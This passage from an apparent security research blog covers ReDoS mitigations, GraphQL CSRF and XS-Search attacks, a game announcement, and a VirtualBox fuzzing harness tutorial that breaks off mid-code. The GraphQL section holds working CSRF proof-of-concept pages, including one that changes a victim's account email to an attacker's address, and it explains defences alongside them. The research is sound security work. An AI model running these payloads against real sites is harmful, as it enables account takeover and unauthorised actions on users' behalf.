Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

xkcd 208: Regular Expressions (sorry, I wanted to shoehorn this comic in somewhere)

Mitigations - Safety first

Use a DFA

So why didn’t I bother looking for ReDoS in Golang? Go’s regex engine re2 does not backtrack.

Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input. There was a trade-off though. Depending on your use-case, libraries like re2 may not be the fastest engines. There are also some regex features such as backreferences which had to be dropped. But in the pathological case, regexes won’t be what takes down your website. There are re2 libraries for many languages, so you can use it in preference to Python’s re module.
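
As a quick sketch, assuming the pyre2 / google-re2 Python bindings (which expose a mostly re-compatible API), the pathological payload from the CairoSVG example above becomes harmless:

import re2  # e.g. pip install google-re2; a mostly drop-in replacement for re

# RE2 guarantees linear-time matching, so this returns immediately instead of
# backtracking at 100% CPU.
RGBA = re2.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
print(RGBA.search('rgba(' + ' ' * 3456))   # None, returned instantly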

Don’t do it all with regexes

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.
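
As a minimal sketch of that idea for the rgba() case above (a hypothetical rewrite, not CairoSVG’s actual fix), let the regex grab everything up to the closing parenthesis unambiguously and do the trimming in plain Python:

import re

# [^)]* cannot match the closing parenthesis, so there is no ambiguity with the
# surrounding whitespace and therefore no catastrophic backtracking.
RGBA = re.compile(r'rgba\(([^)]*)\)')

def parse_rgba(value):
    match = RGBA.search(value)
    if match is None:
        return None
    # strip the whitespace in ordinary Python instead of inside the regex
    return [part.strip() for part in match.group(1).split(',')]

print(parse_rgba('rgba(   100,200, 10, 0.5   )'))  # ['100', '200', '10', '0.5']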

Many tiny regexes

In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”. While the http-cookie gem has many more lines of code than a mega-regex, it avoids ReDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack. In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.
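
As a minimal sketch of possessive-quantifier semantics, assuming Python 3.11 or newer (which added them to the re module):

import re  # possessive quantifiers require Python 3.11+

# A greedy quantifier gives characters back and eventually matches:
print(re.fullmatch(r'\d+4', '1234'))    # matches '1234'

# A possessive quantifier keeps every digit it consumed, leaving nothing for the
# literal '4', so the match fails immediately instead of backtracking:
print(re.fullmatch(r'\d++4', '1234'))   # None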

Gotta catch ‘em all 🐛🐞🦠

That single GraphQL issue that you keep missing

19 May 2021 at 22:00

With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.

GraphQL what?

GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:

  • Aggregating data from multiple sources
  • Decoupling the data from the database underneath, through a graph form
  • Ensuring input type correctness with minimal effort from the developers

CSRF eh?

Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.

GraphQL CSRF: more buzzword combos please!

POST-based CSRF

POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept Content-Type headers set to application/json only, which is widely believed to be invulnerable to CSRF. As multiple layers of middleware may translate the incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded, multipart/form-data), GraphQL implementations are often affected by CSRF. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers may incorrectly forego implementing proper CSRF protections.

The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 100
accept: */*
User-Agent: ...
content-type: application/json
Referer: https://redacted/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}

It is common, due to middleware magic, to have a server accepting the same request as a form-urlencoded POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 72
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://redacted
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A

A seasoned Burp user can quickly convert this into a CSRF PoC through Engagement Tools > Generate CSRF PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://redacted/graphql" method="POST">
      <input type="hidden" name="query" value="&#123;&#10;&#32;&#32;user&#32;&#123;&#10;&#32;&#32;&#32;&#32;firstName&#10;&#32;&#32;&#32;&#32;&#95;&#95;typename&#10;&#32;&#32;&#125;&#10;&#125;&#10;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the transport layer that passes them the request, any other operation can be issued the same way, including mutations.

GET Based CSRF

There are two common issues that we have spotted during our past engagements.

The first one is using GET requests for both queries and mutations.

For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query or mutation requests. In fact, GraphiQL does allow mutations via GET requests.


While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wide.

For the sake of an example, we include the Proof-of-Concept for a mutation that handles a file upload functionality:

<!DOCTYPE html>
<html>
<head>
    <title>GraphQL CSRF file upload</title>
</head>
	<body>
		<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!) %20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType) %20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A %20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>
	</body>
</html>

The second issue arises when a state-changing GraphQL operation is misplaced among the queries, which are normally non-state-changing. In fact, most GraphQL server implementations respect this paradigm, and they even block any kind of mutation issued through the GET HTTP method. Discovering this type of issue is trivial and can be performed by enumerating query names and trying to understand what they do. For this reason, we developed a tool for query/mutation enumeration.
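
As a rough illustration of the idea (this is not the tool itself, and it assumes introspection is enabled on the target), the exposed operations can be listed with a single standard introspection query:

import requests

# List the query and mutation names exposed by a GraphQL endpoint.
# The URL is a placeholder.
INTROSPECTION = """
{
  __schema {
    queryType { fields { name } }
    mutationType { fields { name } }
  }
}
"""

resp = requests.post('https://victimhost.com/graphql', json={'query': INTROSPECTION})
schema = resp.json()['data']['__schema']
print('Queries:  ', [f['name'] for f in schema['queryType']['fields']])
print('Mutations:', [f['name'] for f in (schema['mutationType'] or {}).get('fields', [])])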

During an engagement, we discovered the following query that was issuing a state changing operation:

req := graphql.NewRequest(`
	query SetUserEmail($email: String!) {
		SetUserEmail(user_email: $email) {
			id
			email
		}
	}
`)

Given that the id value was easily guessable, we were able to prepare a CSRF PoC:

<!DOCTYPE html>
<html>
	<head>
		<title>GraphQL CSRF - State Changing Query</title> 
	</head>
	<body>
		<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A%26variables%3D%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%2C%0A%7D"></iframe>
	</body>
</html>

Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:

urlpatterns = patterns(
    # ...
    url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True))),
    # ...
)
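
Conversely, a minimal sketch of keeping the protection in place (assuming graphene-django and a modern Django URL configuration) is to register the view without csrf_exempt, or to wrap it explicitly:

from django.urls import path
from django.views.decorators.csrf import csrf_protect
from graphene_django.views import GraphQLView

urlpatterns = [
    # ...
    # keep Django's CSRF middleware in the loop instead of opting out with csrf_exempt
    path('graphql', csrf_protect(GraphQLView.as_view(graphiql=False))),
    # ...
]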

CSRF: Better Safe Than Sorry

Some browsers, such as Chrome, recently defaulted cookie behavior to be equivalent to SameSite=Lax, which protects from the most common CSRF vectors.

Other prevention methods can be implemented within each application. The most common are:

  • Built-in CSRF protection in modern frameworks
  • Origin verification
  • Double submit cookies
  • User interaction based protection
  • Not using GET requests for state-changing operations
  • Extending CSRF protection to GET requests too

There isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.

Rumbling The XS-Search

In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.

For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm their existence/accessibility.

Applications which accept GET requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.

XS-Search is quite a neat and simple technique which can transform the following query into an attacker-controlled binary search (e.g. we can enumerate the users of a private platform):

query {
	isEmailAvailable(email:"foo@bar.com") {
		is_email_available
	}
}

In HTTP GET form:

GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Host: redacted
Content-Length: 0
Content-Type: application/json
Cookie: ...

The implications of a successful XS-Search attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.

Automate Everything!!!

As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.

For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.

InQL v4 can assist in detecting these issues:

  • By identifying various classes of CSRF through new “Send to Repeater” helpers:

    • GET query parameters
    • POST form-data
    • POST x-form-urlencoded
  • By improving the query generation


Something for our beloved number crunchers!

We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days and should not be considered conclusive or complete, the numbers show an impressive amount of unpatched vulnerabilities:

  • 14 (~50%) were vulnerable to some kind of XS-Search, equivalent to a GET-based CSRF
  • 3 (~10%) were vulnerable to CSRF

TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!

References

H1.Jack, The Game

15 February 2022 at 23:00

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle, we’re always challenging ourselves to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite having virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the “cyber” space. After many prototypes and changes of direction, we spent a good portion of our 2020 spare time working on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite it all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play title with no advertisements. We hope you’ll enjoy the game in between your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

H1jack Room

While playing, you might end up talking to John or Luca.

Luca&John H1jack

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

Introduction to VirtualBox security research

25 April 2022 at 22:00

Introduction

This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.

We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.

In our setup, we use Ubuntu 20.04.3 LTS. As nested VT-x/AMD-V virtualization is not fully supported by VirtualBox, we use a native host rather than a VM. When using a MacBook, the following guide enables a Linux installation on an external SSD.

VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.

kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.

Note that in this article, we will use three different builds. The remaining two release builds are for fuzzing and coverage reporting. Because they involve modifying the source code, we use a separate directory for every instance.

Debug Build

The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:

$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug

If successful, the binary VirtualBox from the out/linux.amd64/debug/bin/VirtualBox directory will be created. Before creating our first guest host, we have to compile and load the kernel modules:

$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)

VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, allowing us to selectively enable logging for specific files or functionalities. Unfortunately, since the logging is intended for debug builds, we could not enable this functionality in the release build without making many cumbersome changes.

Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:

$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp

src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET

We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:

$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test

The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.

AFL instrumentation for afl-clang-fast / afl-clang-fast++

Installing Clang

For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:

$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version

$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar

Building AFLplusplus (AFL++)

Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only parts:

$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus

# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560

$ make source-only
$ sudo make install

Applying patches

To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk by using the vbox-fuzz/AFL.kmk file, available on https://github.com/doyensec/vbox-fuzz.

Moreover, we have to fix multiple issues related to undefined symbols or different commentary styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL). Otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.

Interestingly, when I was investigating the error message I obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and that more people were trying the same approach. The slides also mention VBoxHeadless, which was a natural choice for a harness and which we used too.

If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:

$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl

$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch

Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:

$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
                 U __afl_area_ptr
                 U __afl_coverage_discard
                 U __afl_coverage_off
                 U __afl_coverage_on
                 U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards

Creating Coverage Reports

First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:

$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out

Now we have to edit the kBuild/tools/AFL.kmk template to append -fprofile-instr-generate -fcoverage-mapping switches as follows:

TOOL_AFL_CC  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD  ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping

To avoid duplication, we share the src and include folders with the fuzzing build:

$ rm -rf ./src
$ rm -rf ./include

$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include

Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:

ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup

Furthermore, because this build is intended for reporting only, we disable all unnecessary features:

$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk

The raw profile is generated by setting LLVM_PROFILE_FILE. For more information, the Clang documentation provides the necessary details.

Writing a harness

Getting pVM

At this point, the VirtualBox drivers are fully instrumented, and the only remaining thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. Our output is truncated to include only R3 components, as these are the ones we are targeting:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
    /* .u32Version = */             PDM_DEVREG_VERSION,
    /* .uReserved0 = */             0,
    /* .szName = */                 "pcnet",
#ifdef PCNET_GC_ENABLED
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
    /* .fClass = */                 PDM_DEVREG_CLASS_NETWORK,
    /* .cMaxInstances = */          ~0U,
    /* .uSharedVersion = */         42,
    /* .cbInstanceShared = */       sizeof(PCNETSTATE),
    /* .cbInstanceCC = */           sizeof(PCNETSTATECC),
    /* .cbInstanceRC = */           sizeof(PCNETSTATERC),
    /* .cMaxPciDevices = */         1,
    /* .cMaxMsixVectors = */        0,
    /* .pszDescription = */         "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
    /* .pszRCMod = */               "VBoxDDRC.rc",
    /* .pszR0Mod = */               "VBoxDDR0.r0",
    /* .pfnConstruct = */           pcnetR3Construct,
    /* .pfnDestruct = */            pcnetR3Destruct,
    /* .pfnRelocate = */            pcnetR3Relocate,
    /* .pfnMemSetup = */            NULL,
    /* .pfnPowerOn = */             NULL,
    /* .pfnReset = */               pcnetR3Reset,
    /* .pfnSuspend = */             pcnetR3Suspend,
    /* .pfnResume = */              NULL,
    /* .pfnAttach = */              pcnetR3Attach,
    /* .pfnDetach = */              pcnetR3Detach,
    /* .pfnQueryInterface = */      NULL,
    /* .pfnInitComplete = */        NULL,
    /* .pfnPowerOff = */            pcnetR3PowerOff,
    /* .pfnSoftReset = */           NULL,
    /* .pfnReserved0 = */           NULL,
    /* .pfnReserved1 = */           NULL,
    /* .pfnReserved2 = */           NULL,
    /* .pfnReserved3 = */           NULL,
    /* .pfnReserved4 = */           NULL,
    /* .pfnReserved5 = */           NULL,
    /* .pfnReserved6 = */           NULL,
    /* .pfnReserved7 = */           NULL,
#elif defined(IN_RING0)
// [ SNIP ]

The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter ones are currently not used, but we can add our own functions and call them, by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.

But first, if we want to use the modified VboxHeadless, which provides a high-level interface (VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.

By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:

// src/VBox/VMM/VMMR3/PDMDevice.cpp

for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
    // [ SNIP ]
}

The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM. So we wanted to find out if we could leverage it to access the low-level structures. After some digging, we found out that indeed it’s possible to retrieve the VM handle via the IMachineDebugger class:

IMachineDebugger VM

With that, the following snippet of code demonstrates how to access pVM:

LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;

After obtaining the pointer to the VM, we have to change the build scripts again, allowing VboxHeadless to access internal PDM definitions from VBoxHeadless.cpp.

We tried to minimize the amount of changes and after some experimentation, we came up with the following steps:

1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:

/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1

#include "PDMInternal.h"

/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>

/* needed by AFL */
#include <unistd.h>

2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:

            LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */

        /* --------------- BEGIN --------------- */
        LONG64 llVM;
        HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);

        if (SUCCEEDED(hrc)) {

          PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
          PVM pVM = pUVM->pVM;

            for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
                if (!strcmp(pDevIns->pReg->szName, "pcnet")) {

                    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
                    while (__AFL_LOOP(10000))
                    {
                        int len = __AFL_FUZZ_TESTCASE_LEN;
                        pDevIns->pReg->pfnAFL(pDevIns, buf, len);
                    }
                }
            }

        }
        exit(0);
        /* ---------------  END  --------------- */

        /*
         * Pump vbox events forever
         */
        LogRel(("VBoxHeadless: starting event loop\n"));
        for (;;)

3) In the same file, after the #include "PasswordInput.h" directive, add:

#include "harness.h"

Then, append __AFL_FUZZ_INIT(); before the definition of the TrustedMain function:

__AFL_FUZZ_INIT();

/**
 *  Entry point.
 */
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)

4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change the VBoxHeadless_DEFS and VBoxHeadless_INCS from

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS      = \
  $(VBOX_GRAPHICS_INCS) \
  ../Common

to

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS      = \
        $(VBOX_GRAPHICS_INCS) \
        ../Common \
        ../../VMM/include

Fuzzing With Multiple Inputs

For the network drivers, there are various ways of supplying the user-controlled data, such as I/O port access instructions or reading the data from the emulated device via MMIO (PDMDevHlpPhysRead). If this part is unclear, please refer back to [1] in the references, which is probably the best available resource for explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save some time, we want to use only these values. Therefore, while considering how to implement our fuzzing framework, we discovered FuzzedDataProvider (FDP from here on).

FDP is part of LLVM and, after we pass it a buffer generated by AFL, it can leverage that buffer to generate a restricted set of numbers, bytes, or enums. We can store the pointer to the FDP inside the device driver instance and retrieve it any time we want to consume some data.

Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to conform to our prototype:

DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));

All device drivers have a state, which we can access using the convenient macro PDMDEVINS_2_DATA. Likewise, we can include the FDP header file and extend the state structure (in our case PCNETSTATE) with a pointer to the FDP:

// src/VBox/Devices/Network/DevPCNet.cpp

#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif

// [ SNIP ]

typedef struct PCNETSTATE
{
  // [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
    void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;

To reflect these changes, the g_DevicePCNet structure has to be updated too:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
  // [[ SNIP ]]
  /* .pfnConstruct = */           pcnetR3Construct,
  // [[ SNIP ]]
  /* .pfnReserved0 = */           pcnetR3_AFL,
  /* .pfnReserved1 = */           pcnetR3_GetFDP,

When adding new functions, we must be careful and include them inside R3-only parts. The easiest way is to find the R3 constructor and add the new code just after it, as the IN_RING3 macro is already defined there for conditional compilation.

An example of the PCNet harness:

static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
    return pThis->fdp;
}

__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
    if (len > 0x2000) {
        __AFL_COVERAGE_SKIP();
        return VINF_SUCCESS;
    }

    static unsigned char buf2[0x2000];
    memcpy(buf2, buf, len);
    FuzzedDataProvider provider(buf2, len);

    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);

    pThis->fdp = &provider; // Make it accessible for the other modules
    FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);

    void *pvUser = NULL;
    uint32_t u32;
    const std::array<int, 3> Array = {1, 2, 4};
    uint16_t offPort;
    uint16_t cb;

    pcnetR3Reset(pDevIns);

    __AFL_COVERAGE_DISCARD();
    __AFL_COVERAGE_ON();

    while (pfdp->remaining_bytes() > 0) {
        auto choice = pfdp->ConsumeIntegralInRange(0, 3);
        offPort = pfdp->ConsumeIntegral<uint16_t>();

